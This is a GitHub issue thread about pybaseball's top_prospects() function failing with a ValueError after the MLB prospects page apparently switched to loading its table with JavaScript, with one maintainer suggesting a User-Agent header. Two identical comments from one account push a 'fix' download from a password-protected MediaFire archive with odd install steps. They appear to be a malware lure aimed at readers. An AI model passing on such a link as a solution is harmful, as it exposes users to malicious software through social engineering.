### ISSUE TITLE
top_prospects() function no longer works

### ISSUE THREAD

**Issue by ronniejortiz** [jldbc/pybaseball#446]
The top_prospect() function returns a Value Error (seen below). 
![Screenshot 2024-08-26 at 9 20 38 PM](https://github.com/user-attachments/assets/a429c33f-34e3-4435-881b-eef61b60d5d8)

The data is taken from https://www.mlb.com/prospects/stats/top-prospects and when I looked at the HTML there doesn't seem to be a table tag. I'm not super familiar with HTML but I think the webpage is loading the top prospect list dynamically with JavaScript, which is causing the issue.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bdilday** [comment]
maybe adding a `UserAgent` in the headers of the request would work? e.g., https://stackoverflow.com/a/27652558
